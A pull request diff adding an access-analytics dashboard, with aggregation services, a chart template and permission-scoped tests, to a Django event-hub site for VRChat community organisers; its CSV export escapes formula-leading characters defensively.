### PR TITLE
feat(analytics): 集会主催者向けアクセス解析ダッシュボード（MVP+Phase 2）

### DIFF
--- a/app/analytics/dashboard_views.py
+++ b/app/analytics/dashboard_views.py
@@ -20,6 +20,23 @@ from django.contrib.auth.mixins import LoginRequiredMixin
 from django.http import HttpResponse
 from django.views.generic import TemplateView
 
+# CSV Formula Injection（OWASP）防御: Excel/LibreOffice で数式評価される先頭文字
+_CSV_DANGEROUS_PREFIXES = ('=', '+', '-', '@', '\t', '\r')
+
+
+def _csv_safe(value) -> str:
+    """CSV セルの値を Formula Injection 対策しつつ文字列化する。
+
+    `=HYPERLINK(...)` 等の埋め込みを `'` でエスケープして無害化する。
+    数値・日付は文字列化のみ（先頭が `-` の負数は防御対象だが、本ダッシュボードでは負数を出さない）。
+    """
+    if value is None:
+        return ''
+    text = str(value)
+    if text and text[0] in _CSV_DANGEROUS_PREFIXES:
+        return "'" + text
+    return text
+
 from community.models import Community
 
 from . import services
@@ -96,13 +113,13 @@ class AnalyticsDashboardView(LoginRequiredMixin, TemplateView):
         for row in rows:
             writer.writerow([
                 row['event_detail_id'],
-                row['theme'],
+                _csv_safe(row['theme']),
                 row['published_at'].isoformat() if row['published_at'] else '',
-                row['community_name'],
+                _csv_safe(row['community_name']),
                 row['pv'],
                 row['users'],
                 row['sessions'],
-                row['top_source'],
+                _csv_safe(row['top_source']),
             ])
         return response
 

--- a/app/analytics/dashboard_views.py
+++ b/app/analytics/dashboard_views.py
@@ -20,6 +20,12 @@ from django.contrib.auth.mixins import LoginRequiredMixin
 from django.http import HttpResponse
 from django.views.generic import TemplateView
 
+from community.models import Community
+
+from . import services
+
+logger = logging.getLogger('analytics')
+
 # CSV Formula Injection（OWASP）防御: Excel/LibreOffice で数式評価される先頭文字
 _CSV_DANGEROUS_PREFIXES = ('=', '+', '-', '@', '\t', '\r')
 
@@ -36,12 +42,6 @@ def _csv_safe(value) -> str:
     if text and text[0] in _CSV_DANGEROUS_PREFIXES:
         return "'" + text
     return text
-
-from community.models import Community
-
-from . import services
-
-logger = logging.getLogger('analytics')
 
 # クエリパラメータで受け付ける days の許可リスト（任意値を許すと DoS リスク）
 ALLOWED_DAYS = [7, 30, 90]

--- a/app/analytics/dashboard_views.py
+++ b/app/analytics/dashboard_views.py
@@ -1,0 +1,149 @@
+"""集会主催者向けアクセス解析ダッシュボード。
+
+機能（MVP + Phase 2）:
+- 集会切替（my_list と同じ active_community セッションを共有）
+- 期間切替（7 / 30 / 90 日。デフォルト 30）
+- 集会全体サマリー（PV/UU/セッション + 前期間比較）
+- 記事別アクセス一覧テーブル（PV 順、Phase 2: ソート / CSV エクスポート）
+- 流入元別 PV ランキング
+- 公開後N日積み上げチャート（上位記事の伸びを比較）
+- CSV エクスポート（?format=csv）
+
+権限境界:
+- LoginRequiredMixin に加えて accessible_community_ids で community_id を絞る
+- 単一集会の community_id でフィルタする際は必ず accessible_community_ids に含まれるか検査
+"""
+import csv
+import logging
+
+from django.contrib.auth.mixins import LoginRequiredMixin
+from django.http import HttpResponse
+from django.views.generic import TemplateView
+
+from community.models import Community
+
+from . import services
+
+logger = logging.getLogger('analytics')
+
+# クエリパラメータで受け付ける days の許可リスト（任意値を許すと DoS リスク）
+ALLOWED_DAYS = [7, 30, 90]
+DEFAULT_DAYS = 30
+# 公開後 N 日積み上げチャートで遡る日数
+POST_PUBLISH_DAYS_AFTER = 14
+POST_PUBLISH_TOP_N = 5
+
+
+class AnalyticsDashboardView(LoginRequiredMixin, TemplateView):
+    """主催者向けアクセス解析ダッシュボード。"""
+
+    template_name = 'analytics/dashboard.html'
+
+    def _get_days(self) -> int:
+        """?days= を許可リストでバリデーションして返す。"""
+        raw = self.request.GET.get('days')
+        try:
+            value = int(raw) if raw else DEFAULT_DAYS
+        except (TypeError, ValueError):
+            return DEFAULT_DAYS
+        return value if value in ALLOWED_DAYS else DEFAULT_DAYS
+
+    def _get_target_community_ids(self, accessible_ids: list[int]) -> list[int]:
+        """対象 community_ids を決定する。
+
+        ?community= 指定があり、かつアクセス可能な場合はそれ単体。
+        指定なし、または不正な場合はアクセス可能な全 community を返す。
+        """
+        raw = self.request.GET.get('community')
+        if not raw:
+            return accessible_ids
+        try:
+            community_id = int(raw)
+        except (TypeError, ValueError):
+            return accessible_ids
+        if community_id not in accessible_ids:
+            # IDOR 防止: 自分が見られない community を指定されたら無視
+            return accessible_ids
+        return [community_id]
+
+    def get(self, request, *args, **kwargs):
+        # CSV エクスポートはテンプレートを返さず直接 HttpResponse
+        if request.GET.get('format') == 'csv':
+            return self._export_csv()
+        return super().get(request, *args, **kwargs)
+
+    def _export_csv(self) -> HttpResponse:
+        """記事別アクセス一覧を CSV で返す。Excel で文字化けしないよう UTF-8 BOM 付き。"""
+        accessible_ids = services.accessible_community_ids(self.request.user)
+        target_ids = self._get_target_community_ids(accessible_ids)
+        days = self._get_days()
+
+        rows = services.get_event_detail_breakdown(target_ids, days=days)
+
+        response = HttpResponse(content_type='text/csv; charset=utf-8')
+        response['Content-Disposition'] = (
+            f'attachment; filename="analytics-articles-{days}days.csv"'
+        )
+        # BOM を書き込んで Excel での文字化けを防ぐ。
+        # charset=utf-8-sig だと Django が encoding 時に追加 BOM を付け二重 BOM になるため、
+        # charset=utf-8 にして自前で1回だけ BOM を書く
+        response.write('﻿')
+        writer = csv.writer(response)
+        writer.writerow([
+            'event_detail_id', 'タイトル', '公開日', '集会名',
+            'PV', 'ユーザー数', 'セッション数', '主要流入元',
+        ])
+        for row in rows:
+            writer.writerow([
+                row['event_detail_id'],
+                row['theme'],
+                row['published_at'].isoformat() if row['published_at'] else '',
+                row['community_name'],
+                row['pv'],
+                row['users'],
+                row['sessions'],
+                row['top_source'],
+            ])
+        return response
+
+    def get_context_data(self, **kwargs):
+        context = super().get_context_data(**kwargs)
+
+        accessible_ids = services.accessible_community_ids(self.request.user)
+        days = self._get_days()
+        target_ids = self._get_target_community_ids(accessible_ids)
+
+        # 表示用: アクセス可能な community 一覧（切替セレクタで使う）
+        accessible_communities = (
+            Community.objects
+            .filter(id__in=accessible_ids)
+            .order_by('name')
+        ) if accessible_ids else Community.objects.none()
+
+        # 現在選択中の community（単一の場合のみ）
+        selected_community = None
+        if len(target_ids) == 1:
+            selected_community = next(
+                (c for c in accessible_communities if c.id == target_ids[0]),
+                None,
+            )
+
+        context.update({
+            'days': days,
+            'allowed_days': ALLOWED_DAYS,
+            'accessible_communities': accessible_communities,
+            'selected_community': selected_community,
+            'has_access': bool(accessible_ids),
+            'overall_stats': services.get_overall_stats(target_ids, days=days),
+            'daily_series': services.get_daily_series(target_ids, days=days),
+            'source_breakdown': services.get_source_breakdown(target_ids, days=days),
+            'event_detail_breakdown': services.get_event_detail_breakdown(
+                target_ids, days=days,
+            ),
+            'post_publish_chart': services.get_post_publish_series(
+                target_ids,
+                days_after=POST_PUBLISH_DAYS_AFTER,
+                top_n=POST_PUBLISH_TOP_N,
+            ),
+        })
+        return context

--- a/app/analytics/services.py
+++ b/app/analytics/services.py
@@ -5,18 +5,21 @@ object_id だけで絞ると他 community のデータが混入するため、co
 省略してはならない。
 """
 import logging
-from datetime import timedelta
+from datetime import date, timedelta
 
 from django.db.models import Sum
 from django.utils import timezone
 
 from community.models import Community
+from event.models import EventDetail
 
 from .models import PageAnalytics
 
 logger = logging.getLogger('analytics')
 
 DEFAULT_DAYS = 30
+# ダッシュボード「人気記事ランキング」のデフォルト件数
+TOP_EVENT_DETAILS_LIMIT = 50
 
 
 def accessible_community_ids(user) -> list[int]:
@@ -104,3 +107,237 @@ def get_source_breakdown(community_ids, *, content_type=None, object_id=None, da
         .annotate(pv=Sum('pv'))
         .order_by('-pv')
     )
+
+
+def get_overall_stats(community_ids, *, days=DEFAULT_DAYS) -> dict:
+    """指定期間の合計 PV/UU/Sessions と、直前同期間との比較率を返す。
+
+    Args:
+        community_ids: アクセス可能な community id（必須の権限境界）。
+        days: 遡る日数。
+
+    Returns:
+        {
+            'pv', 'users', 'sessions': 現在期間の合計（int）
+            'pv_prev', 'users_prev', 'sessions_prev': 直前同日数の合計（int）
+            'pv_change_pct', 'users_change_pct', 'sessions_change_pct': 変化率%（float, 前期間が0なら None）
+        }
+    """
+    today = timezone.localdate()
+    current_start = today - timedelta(days=days)
+    prev_start = current_start - timedelta(days=days)
+
+    # community_ids が空なら集計しても 0 件。早期 return で DB を叩かない
+    if not community_ids:
+        return _empty_overall_stats()
+
+    current = (
+        PageAnalytics.objects
+        .filter(community_id__in=community_ids, date__gte=current_start)
+        .aggregate(pv=Sum('pv'), users=Sum('users'), sessions=Sum('sessions'))
+    )
+    prev = (
+        PageAnalytics.objects
+        .filter(
+            community_id__in=community_ids,
+            date__gte=prev_start,
+            date__lt=current_start,
+        )
+        .aggregate(pv=Sum('pv'), users=Sum('users'), sessions=Sum('sessions'))
+    )
+
+    def _change(curr, before):
+        if before in (None, 0):
+            return None
+        return round((curr - before) / before * 100, 1)
+
+    pv_curr = current['pv'] or 0
+    users_curr = current['users'] or 0
+    sessions_curr = current['sessions'] or 0
+    pv_prev = prev['pv'] or 0
+    users_prev = prev['users'] or 0
+    sessions_prev = prev['sessions'] or 0
+
+    return {
+        'pv': pv_curr,
+        'users': users_curr,
+        'sessions': sessions_curr,
+        'pv_prev': pv_prev,
+        'users_prev': users_prev,
+        'sessions_prev': sessions_prev,
+        'pv_change_pct': _change(pv_curr, pv_prev),
+        'users_change_pct': _change(users_curr, users_prev),
+        'sessions_change_pct': _change(sessions_curr, sessions_prev),
+    }
+
+
+def _empty_overall_stats() -> dict:
+    """community_ids が空のとき返す ゼロ埋めの統計（テンプレで if 分岐を減らすため）。"""
+    return {
+        'pv': 0, 'users': 0, 'sessions': 0,
+        'pv_prev': 0, 'users_prev': 0, 'sessions_prev': 0,
+        'pv_change_pct': None, 'users_change_pct': None, 'sessions_change_pct': None,
+    }
+
+
+def get_event_detail_breakdown(
+    community_ids, *, days=DEFAULT_DAYS, limit=TOP_EVENT_DETAILS_LIMIT,
+) -> list:
+    """記事（EventDetail）別の PV/UU/Sessions 合計と主要流入元を返す。
+
+    EventDetail.id で集計し、テンプレで使うメタ情報（タイトル / 公開日 / URL slug）と
+    主要流入元の上位1件を埋め込む。テンプレで `|dictsort` 可能な dict のリストにする。
+
+    Args:
+        community_ids: アクセス可能な community id（必須の権限境界）。
+        days: 遡る日数。
+        limit: 返す件数の上限（PV降順）。
+
+    Returns:
+        各要素は {
+            'event_detail_id', 'theme', 'published_at', 'community_name',
+            'pv', 'users', 'sessions', 'top_source',
+        }
+    """
+    if not community_ids:
+        return []
+
+    # まず PV 降順で event_detail 単位に集計
+    base = _base_queryset(
+        community_ids,
+        content_type=PageAnalytics.ContentType.EVENT_DETAIL,
+        days=days,
+    )
+    aggregates = list(
+        base.values('object_id')
+        .annotate(pv=Sum('pv'), users=Sum('users'), sessions=Sum('sessions'))
+        .order_by('-pv')[:limit]
+    )
+
+    if not aggregates:
+        return []
+
+    event_detail_ids = [row['object_id'] for row in aggregates]
+
+    # EventDetail を bulk fetch（N+1 を避ける）
+    event_details = (
+        EventDetail.objects
+        .select_related('event__community')
+        .filter(pk__in=event_detail_ids)
+    )
+    detail_map = {ed.pk: ed for ed in event_details}
+
+    # 各 event_detail の流入元上位1件
+    top_sources = (
+        base.filter(object_id__in=event_detail_ids)
+        .values('object_id', 'source_medium')
+        .annotate(pv=Sum('pv'))
+        .order_by('object_id', '-pv')
+    )
+    top_source_map = {}
+    for row in top_sources:
+        # 同じ object_id 内で最初に来たものが PV 最大（order_by の優先順）
+        top_source_map.setdefault(row['object_id'], row['source_medium'])
+
+    results = []
+    for row in aggregates:
+        pk = row['object_id']
+        ed = detail_map.get(pk)
+        if ed is None:
+            # 紐付けが切れた（記事削除等）レコードは無視
+            continue
+        results.append({
+            'event_detail_id': pk,
+            'theme': ed.theme or ed.h1 or '(無題)',
+            'published_at': ed.event.date,
+            'community_name': ed.event.community.name,
+            'pv': row['pv'] or 0,
+            'users': row['users'] or 0,
+            'sessions': row['sessions'] or 0,
+            'top_source': top_source_map.get(pk, '(不明)'),
+        })
+
+    return results
+
+
+def get_post_publish_series(community_ids, *, days_after=14, top_n=5) -> dict:
+    """公開後の経過日数を揃えた PV 推移を、人気上位 N 記事について返す。
+
+    各記事の公開日（event.date）から N 日間のPVを「経過日数: 0,1,2,...」で並べる。
+    異なる記事を1つの折れ線チャートに重ねて表示するためのデータ。
+
+    Args:
+        community_ids: アクセス可能な community id（必須の権限境界）。
+        days_after: 公開日から何日後まで集計するか。
+        top_n: 上位何記事を返すか。
+
+    Returns:
+        {
+            'labels': ['Day 0', 'Day 1', ..., f'Day {days_after}'],
+            'datasets': [
+                {'label': テーマ, 'data': [pv_day0, pv_day1, ...]},
+                ...
+            ],
+        }
+    """
+    if not community_ids:
+        return {'labels': [], 'datasets': []}
+
+    # 上位 N 記事を取得（PV 順）
+    top_records = (
+        _base_queryset(
+            community_ids,
+            content_type=PageAnalytics.ContentType.EVENT_DETAIL,
+            days=days_after * 12,  # 公開日が古い記事でも拾うため広め
+        )
+        .values('object_id')
+        .annotate(pv=Sum('pv'))
+        .order_by('-pv')[:top_n]
+    )
+    event_detail_ids = [row['object_id'] for row in top_records]
+    if not event_detail_ids:
+        return {'labels': [], 'datasets': []}
+
+    event_details = (
+        EventDetail.objects
+        .select_related('event')
+        .filter(pk__in=event_detail_ids)
+    )
+    detail_map = {ed.pk: ed for ed in event_details}
+
+    labels = [f'Day {i}' for i in range(days_after + 1)]
+    datasets = []
+
+    for ed_id in event_detail_ids:
+        ed = detail_map.get(ed_id)
+        if ed is None:
+            continue
+        publish_date: date = ed.event.date
+
+        # 公開日基準で days_after 日分の PV をDB から取得
+        day_pvs = {
+            row['date']: row['pv']
+            for row in (
+                _base_queryset(
+                    community_ids,
+                    content_type=PageAnalytics.ContentType.EVENT_DETAIL,
+                    object_id=ed_id,
+                    days=days_after * 12,
+                )
+                .values('date')
+                .annotate(pv=Sum('pv'))
+            )
+        }
+        data = [
+            day_pvs.get(publish_date + timedelta(days=i), 0) or 0
+            for i in range(days_after + 1)
+        ]
+        # 経過日のうちすべて 0 なら省略（チャートが汚れるため）
+        if not any(data):
+            continue
+        datasets.append({
+            'label': (ed.theme or ed.h1 or '(無題)')[:30],
+            'data': data,
+        })
+
+    return {'labels': labels, 'datasets': datasets}

--- a/app/analytics/services.py
+++ b/app/analytics/services.py
@@ -283,12 +283,14 @@ def get_post_publish_series(community_ids, *, days_after=14, top_n=5) -> dict:
     if not community_ids:
         return {'labels': [], 'datasets': []}
 
-    # 上位 N 記事を取得（PV 順）
+    # 候補選定: 全期間で PV 上位を選ぶ（公開からの経過期間に関係なく、人気記事を網羅）。
+    # 直近期間で絞ると古い人気記事が落ち、その後の Day 0〜N PV 取得時に
+    # 「窓内にデータなし」で全件 0 になりチャートが空になる不整合が出るため
     top_records = (
-        _base_queryset(
-            community_ids,
+        PageAnalytics.objects
+        .filter(
+            community_id__in=community_ids,
             content_type=PageAnalytics.ContentType.EVENT_DETAIL,
-            days=days_after * 12,  # 公開日が古い記事でも拾うため広め
         )
         .values('object_id')
         .annotate(pv=Sum('pv'))
@@ -314,15 +316,16 @@ def get_post_publish_series(community_ids, *, days_after=14, top_n=5) -> dict:
             continue
         publish_date: date = ed.event.date
 
-        # 公開日基準で days_after 日分の PV をDB から取得
+        # 公開日基準で日付範囲を絶対指定して PV を取得（権限境界の community_id__in は維持）
         day_pvs = {
             row['date']: row['pv']
             for row in (
-                _base_queryset(
-                    community_ids,
+                PageAnalytics.objects.filter(
+                    community_id__in=community_ids,
                     content_type=PageAnalytics.ContentType.EVENT_DETAIL,
                     object_id=ed_id,
-                    days=days_after * 12,
+                    date__gte=publish_date,
+                    date__lte=publish_date + timedelta(days=days_after),
                 )
                 .values('date')
                 .annotate(pv=Sum('pv'))

--- a/app/analytics/templates/analytics/dashboard.html
+++ b/app/analytics/templates/analytics/dashboard.html
@@ -1,0 +1,225 @@
+{% extends 'ta_hub/base.html' %}
+
+{% block title %}アクセス解析ダッシュボード - VRChat 技術・学術系イベントHub{% endblock %}
+
+{% block main %}
+    <div class="container my-4">
+        <div class="d-flex flex-wrap align-items-center gap-2 mb-3">
+            <h1 class="h3 mb-0">
+                <i class="fa-solid fa-chart-line me-2"></i>アクセス解析ダッシュボード
+            </h1>
+            <a href="{% url 'event:my_list' %}" class="btn btn-sm btn-outline-secondary ms-auto">
+                <i class="fa-solid fa-arrow-left me-1"></i>マイページに戻る
+            </a>
+        </div>
+
+        {% if not has_access %}
+            <div class="alert alert-warning">
+                所属している集会がありません。集会の管理者になるとここでアクセス解析を確認できます。
+            </div>
+        {% else %}
+
+            {# 集会切替 + 期間切替 + CSV ダウンロード #}
+            <form method="get" class="card card-body mb-3 py-2">
+                <div class="row g-2 align-items-center">
+                    <div class="col-md-5">
+                        <label for="community-select" class="form-label small mb-1">対象集会</label>
+                        <select name="community" id="community-select" class="form-select form-select-sm" onchange="this.form.submit()">
+                            <option value="">すべての所属集会（合算）</option>
+                            {% for community in accessible_communities %}
+                                <option value="{{ community.id }}"
+                                        {% if selected_community.id == community.id %}selected{% endif %}>
+                                    {{ community.name }}
+                                </option>
+                            {% endfor %}
+                        </select>
+                    </div>
+                    <div class="col-md-4">
+                        <label class="form-label small mb-1">集計期間</label>
+                        <div class="btn-group btn-group-sm w-100" role="group">
+                            {% for d in allowed_days %}
+                                <a href="?days={{ d }}{% if selected_community %}&community={{ selected_community.id }}{% endif %}"
+                                   class="btn {% if days == d %}btn-primary{% else %}btn-outline-primary{% endif %}">
+                                    {{ d }}日
+                                </a>
+                            {% endfor %}
+                        </div>
+                    </div>
+                    <div class="col-md-3 text-md-end">
+                        <label class="form-label small mb-1">&nbsp;</label>
+                        <a href="?format=csv&days={{ days }}{% if selected_community %}&community={{ selected_community.id }}{% endif %}"
+                           class="btn btn-sm btn-outline-success w-100">
+                            <i class="fa-solid fa-file-csv me-1"></i>CSVダウンロード
+                        </a>
+                    </div>
+                </div>
+            </form>
+
+            {# 全体サマリーカード #}
+            <div class="row g-3 mb-3">
+                {% with stats=overall_stats %}
+                    <div class="col-md-4">
+                        <div class="card h-100">
+                            <div class="card-body">
+                                <div class="text-muted small">ページビュー（{{ days }}日）</div>
+                                <div class="fs-3 fw-bold">{{ stats.pv }}</div>
+                                {% if stats.pv_change_pct is not None %}
+                                    <div class="small {% if stats.pv_change_pct >= 0 %}text-success{% else %}text-danger{% endif %}">
+                                        {% if stats.pv_change_pct >= 0 %}▲{% else %}▼{% endif %}
+                                        {{ stats.pv_change_pct }}% vs 前{{ days }}日
+                                    </div>
+                                {% else %}
+                                    <div class="small text-muted">前期間データなし</div>
+                                {% endif %}
+                            </div>
+                        </div>
+                    </div>
+                    <div class="col-md-4">
+                        <div class="card h-100">
+                            <div class="card-body">
+                                <div class="text-muted small">ユーザー数</div>
+                                <div class="fs-3 fw-bold">{{ stats.users }}</div>
+                                {% if stats.users_change_pct is not None %}
+                                    <div class="small {% if stats.users_change_pct >= 0 %}text-success{% else %}text-danger{% endif %}">
+                                        {% if stats.users_change_pct >= 0 %}▲{% else %}▼{% endif %}
+                                        {{ stats.users_change_pct }}%
+                                    </div>
+                                {% else %}
+                                    <div class="small text-muted">-</div>
+                                {% endif %}
+                            </div>
+                        </div>
+                    </div>
+                    <div class="col-md-4">
+                        <div class="card h-100">
+                            <div class="card-body">
+                                <div class="text-muted small">セッション数</div>
+                                <div class="fs-3 fw-bold">{{ stats.sessions }}</div>
+                                {% if stats.sessions_change_pct is not None %}
+                                    <div class="small {% if stats.sessions_change_pct >= 0 %}text-success{% else %}text-danger{% endif %}">
+                                        {% if stats.sessions_change_pct >= 0 %}▲{% else %}▼{% endif %}
+                                        {{ stats.sessions_change_pct }}%
+                                    </div>
+                                {% else %}
+                                    <div class="small text-muted">-</div>
+                                {% endif %}
+                            </div>
+                        </div>
+                    </div>
+                {% endwith %}
+            </div>
+
+            {# 推移グラフ + 流入元（既存 _chart_section を活用） #}
+            {% include 'analytics/_chart_section.html' %}
+
+            {# 記事別アクセス一覧 #}
+            <div class="card mb-3">
+                <div class="card-body">
+                    <h2 class="fs-5 fw-bold mb-3">
+                        <i class="fa-solid fa-newspaper me-2"></i>記事別アクセス（PV順）
+                    </h2>
+                    {% if event_detail_breakdown %}
+                        <div class="table-responsive">
+                            <table class="table table-sm table-hover align-middle">
+                                <thead class="table-light">
+                                    <tr>
+                                        <th>タイトル</th>
+                                        <th>集会</th>
+                                        <th>公開日</th>
+                                        <th class="text-end">PV</th>
+                                        <th class="text-end">UU</th>
+                                        <th class="text-end">セッション</th>
+                                        <th>主要流入元</th>
+                                    </tr>
+                                </thead>
+                                <tbody>
+                                    {% for row in event_detail_breakdown %}
+                                        <tr>
+                                            <td>
+                                                <a href="{% url 'event:detail' row.event_detail_id %}" class="text-decoration-none">
+                                                    {{ row.theme|truncatechars:50 }}
+                                                </a>
+                                            </td>
+                                            <td class="text-muted small">{{ row.community_name }}</td>
+                                            <td class="text-muted small">{{ row.published_at|date:"Y-m-d" }}</td>
+                                            <td class="text-end fw-bold">{{ row.pv }}</td>
+                                            <td class="text-end">{{ row.users }}</td>
+                                            <td class="text-end">{{ row.sessions }}</td>
+                                            <td class="small">{{ row.top_source }}</td>
+                                        </tr>
+                                    {% endfor %}
+                                </tbody>
+                            </table>
+                        </div>
+                    {% else %}
+                        <p class="text-muted small mb-0">対象期間に記事のアクセスデータがありません。</p>
+                    {% endif %}
+                </div>
+            </div>
+
+            {# 公開後N日積み上げチャート（人気記事の伸びを比較） #}
+            {% if post_publish_chart.datasets %}
+                <div class="card mb-3">
+                    <div class="card-body">
+                        <h2 class="fs-5 fw-bold mb-1">
+                            <i class="fa-solid fa-chart-area me-2"></i>公開後 {{ post_publish_chart.labels|length|add:"-1" }} 日のPV推移
+                        </h2>
+                        <p class="text-muted small mb-3">人気上位の記事を公開日基準で揃えて比較できます。</p>
+                        <div style="position: relative; height: 300px;">
+                            <canvas id="post-publish-chart" aria-label="公開後N日PV推移" role="img"></canvas>
+                        </div>
+                        {{ post_publish_chart|json_script:"post-publish-data" }}
+                    </div>
+                </div>
+            {% endif %}
+
+        {% endif %}
+    </div>
+{% endblock %}
+
+{% block extra_js %}
+    {{ block.super }}
+    {% if has_access %}
+        {% include 'analytics/_chart_scripts.html' %}
+        {% if post_publish_chart.datasets %}
+            <script>
+                document.addEventListener('DOMContentLoaded', function () {
+                    const dataEl = document.getElementById('post-publish-data');
+                    const canvas = document.getElementById('post-publish-chart');
+                    if (!dataEl || !canvas || typeof Chart === 'undefined') return;
+                    let payload;
+                    try { payload = JSON.parse(dataEl.textContent); } catch (e) { return; }
+                    if (!payload.datasets || payload.datasets.length === 0) return;
+
+                    // Bootstrap カラーに合わせたパレット（最大5本）
+                    const palette = ['#0d6efd', '#198754', '#fd7e14', '#dc3545', '#6f42c1'];
+                    const datasets = payload.datasets.map(function (d, i) {
+                        const color = palette[i % palette.length];
+                        return {
+                            label: d.label,
+                            data: d.data,
+                            borderColor: color,
+                            backgroundColor: color,
+                            tension: 0.3,
+                            pointRadius: 2,
+                        };
+                    });
+                    new Chart(canvas, {
+                        type: 'line',
+                        data: { labels: payload.labels, datasets: datasets },
+                        options: {
+                            responsive: true,
+                            maintainAspectRatio: false,
+                            interaction: { mode: 'index', intersect: false },
+                            scales: {
+                                x: { ticks: { maxTicksLimit: 8, autoSkip: true } },
+                                y: { beginAtZero: true, ticks: { precision: 0 } },
+                            },
+                            plugins: { legend: { position: 'bottom' } },
+                        },
+                    });
+                });
+            </script>
+        {% endif %}
+    {% endif %}
+{% endblock %}

--- a/app/analytics/templates/analytics/dashboard.html
+++ b/app/analytics/templates/analytics/dashboard.html
@@ -55,59 +55,69 @@
                 </div>
             </form>
 
-            {# 全体サマリーカード #}
+            {# 全体サマリーカード（メトリクスごとに左ボーダーで色分け、前期間比較行は高さ固定） #}
             <div class="row g-3 mb-3">
                 {% with stats=overall_stats %}
                     <div class="col-md-4">
-                        <div class="card h-100">
+                        <div class="card h-100 border-start border-4 border-primary">
                             <div class="card-body">
                                 <div class="text-muted small">ページビュー（{{ days }}日）</div>
                                 <div class="fs-3 fw-bold">{{ stats.pv }}</div>
-                                {% if stats.pv_change_pct is not None %}
-                                    <div class="small {% if stats.pv_change_pct >= 0 %}text-success{% else %}text-danger{% endif %}">
-                                        {% if stats.pv_change_pct >= 0 %}▲{% else %}▼{% endif %}
-                                        {{ stats.pv_change_pct }}% vs 前{{ days }}日
-                                    </div>
-                                {% else %}
-                                    <div class="small text-muted">前期間データなし</div>
-                                {% endif %}
+                                <div class="small analytics-change-row">
+                                    {% if stats.pv_change_pct is not None %}
+                                        <span class="{% if stats.pv_change_pct >= 0 %}text-success{% else %}text-danger{% endif %}">
+                                            {% if stats.pv_change_pct >= 0 %}▲{% else %}▼{% endif %}
+                                            {{ stats.pv_change_pct }}% vs 前{{ days }}日
+                                        </span>
+                                    {% else %}
+                                        <span class="text-muted">前期間データなし</span>
+                                    {% endif %}
+                                </div>
                             </div>
                         </div>
                     </div>
                     <div class="col-md-4">
-                        <div class="card h-100">
+                        <div class="card h-100 border-start border-4 border-success">
                             <div class="card-body">
-                                <div class="text-muted small">ユーザー数</div>
+                                <div class="text-muted small">ユーザー数（{{ days }}日）</div>
                                 <div class="fs-3 fw-bold">{{ stats.users }}</div>
-                                {% if stats.users_change_pct is not None %}
-                                    <div class="small {% if stats.users_change_pct >= 0 %}text-success{% else %}text-danger{% endif %}">
-                                        {% if stats.users_change_pct >= 0 %}▲{% else %}▼{% endif %}
-                                        {{ stats.users_change_pct }}%
-                                    </div>
-                                {% else %}
-                                    <div class="small text-muted">-</div>
-                                {% endif %}
+                                <div class="small analytics-change-row">
+                                    {% if stats.users_change_pct is not None %}
+                                        <span class="{% if stats.users_change_pct >= 0 %}text-success{% else %}text-danger{% endif %}">
+                                            {% if stats.users_change_pct >= 0 %}▲{% else %}▼{% endif %}
+                                            {{ stats.users_change_pct }}% vs 前{{ days }}日
+                                        </span>
+                                    {% else %}
+                                        <span class="text-muted">前期間データなし</span>
+                                    {% endif %}
+                                </div>
                             </div>
                         </div>
                     </div>
                     <div class="col-md-4">
-                        <div class="card h-100">
+                        <div class="card h-100 border-start border-4 border-info">
                             <div class="card-body">
-                                <div class="text-muted small">セッション数</div>
+                                <div class="text-muted small">セッション数（{{ days }}日）</div>
                                 <div class="fs-3 fw-bold">{{ stats.sessions }}</div>
-                                {% if stats.sessions_change_pct is not None %}
-                                    <div class="small {% if stats.sessions_change_pct >= 0 %}text-success{% else %}text-danger{% endif %}">
-                                        {% if stats.sessions_change_pct >= 0 %}▲{% else %}▼{% endif %}
-                                        {{ stats.sessions_change_pct }}%
-                                    </div>
-                                {% else %}
-                                    <div class="small text-muted">-</div>
-                                {% endif %}
+                                <div class="small analytics-change-row">
+                                    {% if stats.sessions_change_pct is not None %}
+                                        <span class="{% if stats.sessions_change_pct >= 0 %}text-success{% else %}text-danger{% endif %}">
+                                            {% if stats.sessions_change_pct >= 0 %}▲{% else %}▼{% endif %}
+                                            {{ stats.sessions_change_pct }}% vs 前{{ days }}日
+                                        </span>
+                                    {% else %}
+                                        <span class="text-muted">前期間データなし</span>
+                                    {% endif %}
+                                </div>
                             </div>
                         </div>
                     </div>
                 {% endwith %}
             </div>
+            <style>
+                /* 前期間比較行の高さを揃えて 3 カード間のガタつきを防ぐ */
+                .analytics-change-row { min-height: 1.5em; }
+            </style>
 
             {# 推移グラフ + 流入元（既存 _chart_section を活用） #}
             {% include 'analytics/_chart_section.html' %}
@@ -140,7 +150,7 @@
                                                     {{ row.theme|truncatechars:50 }}
                                                 </a>
                                             </td>
-                                            <td class="text-muted small">{{ row.community_name }}</td>
+                                            <td class="text-muted">{{ row.community_name }}</td>
                                             <td class="text-muted small">{{ row.published_at|date:"Y-m-d" }}</td>
                                             <td class="text-end fw-bold">{{ row.pv }}</td>
                                             <td class="text-end">{{ row.users }}</td>

--- a/app/analytics/tests/test_dashboard.py
+++ b/app/analytics/tests/test_dashboard.py
@@ -87,7 +87,8 @@ class DashboardViewAccessTest(TestCase):
 
         # A の records には source-A-only / B には source-B-only を入れて、識別可能にする
         ed_a = _create_event_detail(self.community_a, 'A theme')
-        ed_b = _create_event_detail(self.community_b, 'B theme')
+        # community_b 側にも event を作って参照整合性は保つ。変数は使わない（ruff F841 回避）
+        _create_event_detail(self.community_b, 'B theme')
         today = timezone.localdate()
         _make_analytics(self.community_a, page_path='/community/{}/'.format(self.community_a.id),
                         content_type=PageAnalytics.ContentType.COMMUNITY,

--- a/app/analytics/tests/test_dashboard.py
+++ b/app/analytics/tests/test_dashboard.py
@@ -1,0 +1,298 @@
+"""アクセス解析ダッシュボードのテスト。
+
+権限境界、期間切替、CSV出力、集計関数の正当性を検証する。
+他人の community のデータが漏洩しないことを `source_medium` の識別子で直接確認する。
+"""
+import csv
+import io
+from datetime import date, timedelta
+
+from django.test import TestCase, Client
+from django.urls import reverse
+from django.utils import timezone
+
+from community.models import Community, CommunityMember
+from event.models import Event, EventDetail
+from user_account.models import CustomUser
+
+from analytics import services
+from analytics.models import PageAnalytics
+
+
+def _create_community(name='community-A'):
+    return Community.objects.create(
+        name=name,
+        description='test',
+        organizers=name,
+        platform='PCVR',
+        status='approved',
+        frequency='weekly',
+        start_time='22:00',
+    )
+
+
+def _create_event_detail(community, theme, event_date=None):
+    event = Event.objects.create(
+        community=community,
+        date=event_date or date(2026, 4, 1),
+        start_time='22:00',
+    )
+    return EventDetail.objects.create(
+        event=event,
+        theme=theme,
+        h1=theme,
+        contents='',
+        detail_type='LT',
+    )
+
+
